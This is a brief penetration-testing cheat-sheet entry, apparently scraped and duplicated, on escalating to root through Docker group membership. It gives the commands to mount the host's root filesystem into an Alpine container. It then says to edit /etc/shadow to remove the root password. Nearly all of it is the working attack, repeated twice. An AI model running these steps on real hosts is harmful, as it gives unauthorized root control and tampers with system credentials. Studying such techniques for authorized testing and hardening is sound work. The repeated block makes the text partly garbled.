Docker (Group)
### mount the real host / root directory to /mnt:
>>> groups
>>> docker run -v /:/mnt -it alpine
>>> ls
>>> cd mnt
>>> ls
--------------now generate key-gens , vim /etc/shadow and remove root password,etc....-----
Last updated
### mount the real host / root directory to /mnt:
>>> groups
>>> docker run -v /:/mnt -it alpine
>>> ls
>>> cd mnt
>>> ls
--------------now generate key-gens , vim /etc/shadow and remove root password,etc....-----
Last updated